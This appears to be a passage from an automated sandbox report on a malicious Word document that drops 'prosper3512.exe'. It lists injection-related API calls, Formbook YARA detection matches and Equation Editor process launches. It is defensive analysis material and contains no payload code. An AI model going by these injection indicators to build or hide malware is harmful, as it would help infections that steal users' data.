          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_021407AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02140048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02140078 NtResumeThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02140060 NtQuerySection,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_021410D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0214010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02141148 NtOpenThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_021401D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02141930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02140C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0213FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02141D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00099D50 NtCreateFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00099E00 NtReadFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00099E80 NtClose,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00099F30 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00099D4C NtCreateFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00099DFD NtReadFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00099E7A NtClose,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00099F2B NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_004793CE NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00479862 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_004793D2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00479DAE NtResumeThread,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 4_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 4_2_00404853
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 4_2_00406131
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 4_2_72FE1A98
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0041D82F
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00401030
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0041D1F9
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0041D442
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0041DDD3
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00402D87
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00402D90
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00409E2B
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00409E30
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0041DFE7
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00402FB0
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0093E0C6
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0096D005
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0095905A
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00943040
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_009BD06D
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_009CD13F
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0093E2E9
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_009E1238
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_009E63BF
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_009663DB
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0093F3CF
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00942305
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00947353
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0098A37B
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00975485
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00951489
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_009C443E
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0097D47D
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0095C5F0
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_009C05E3
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0094351F
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00986540
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00944680
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0094E6C1
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0098A634
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_009E2622
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_009C579A
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0094C7BC
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_009757C3
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_009BF8C4
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_009DF8EE
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0094C85C
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0096286D
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_009E098E
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_009429B2
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_009569FE
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_009C5955
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_009C394B
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_009F3A83
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_009ECBA4
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0093FBD7
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_009CDBDA
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_009C6BCB
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00967B00
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_009CAC5E
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_009DFDDD
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00970D3B
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0094CD5B
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00972E2F
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0095EE4C
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_009DCFB1
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_009B2FDC
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_009CBF14
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_00950F3F
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_2_0096DF7C
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_00401030
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_0041D1F9
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_0041D442
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_0041D82F
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_0041DDD3
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_00402D87
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_00402D90
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_00409E2B
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_00409E30
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_0041DFE7
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 5_1_00402FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_021F1238
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0214E2E9
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02152305
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02157353
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0219A37B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_021F63BF
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_021763DB
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0214F3CF
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0217D005
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0216905A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02153040
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0214E0C6
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0219A634
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_021F2622
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02154680
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0215E6C1
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_021D579A
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0215C7BC
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_021857C3
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_021D443E
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0218D47D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02185485
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02161489
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0215351F
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02196540
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0216C5F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02203A83
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02177B00
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_021FCBA4
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0214FBD7
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_021DDBDA
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0215C85C
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0217286D
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_021EF8EE
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_021D5955
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_021D394B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_021F098E
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_021529B2
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_021669FE
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02182E2F
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0216EE4C
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02160F3F
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0217DF7C
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_021ECFB1
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_021C2FDC
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02180D3B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0215CD5B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_021EFDDD
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0009D1F9
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00082D87
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00082D90
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00089E2B
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00089E30
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00082FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0009DFE7
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00479862
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00471069
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00471072
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00478132
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0047DA6F
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0047AA32
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0047DB0E
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00475B1F
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00475B22
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00472CEC
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00472CF2
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: String function: 0041BBD0 appears 38 times
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: String function: 0093DF5C appears 124 times
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: String function: 0098373B appears 248 times
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: String function: 009AF970 appears 84 times
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: String function: 00983F92 appears 132 times
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: String function: 0093E2A8 appears 58 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0214DF5C appears 119 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0214E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 021BF970 appears 84 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0219373B appears 245 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 02193F92 appears 132 times
          Source: 00000005.00000002.2159297947.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2159297947.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2343620271.0000000000390000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2343620271.0000000000390000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2343505318.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2343505318.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000001.2084947742.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000001.2084947742.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2343583438.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2343583438.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2160305551.00000000008D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2160305551.00000000008D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2159230882.0000000000290000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2159230882.0000000000290000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2086370454.00000000005C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2086370454.00000000005C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.prosper3512.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.prosper3512.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.prosper3512.exe.5c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.prosper3512.exe.5c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.prosper3512.exe.5c0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.prosper3512.exe.5c0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.prosper3512.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.prosper3512.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.prosper3512.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.prosper3512.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.prosper3512.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.prosper3512.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: explorer.exe, 00000006.00000000.2095586228.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@10/12@5/2
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 4_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 4_2_00402020 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$B00028487364 -000487449287.docJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC4F3.tmpJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: AWB00028487364 -000487449287.docVirustotal: Detection: 30%
          Source: AWB00028487364 -000487449287.docReversingLabs: Detection: 36%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
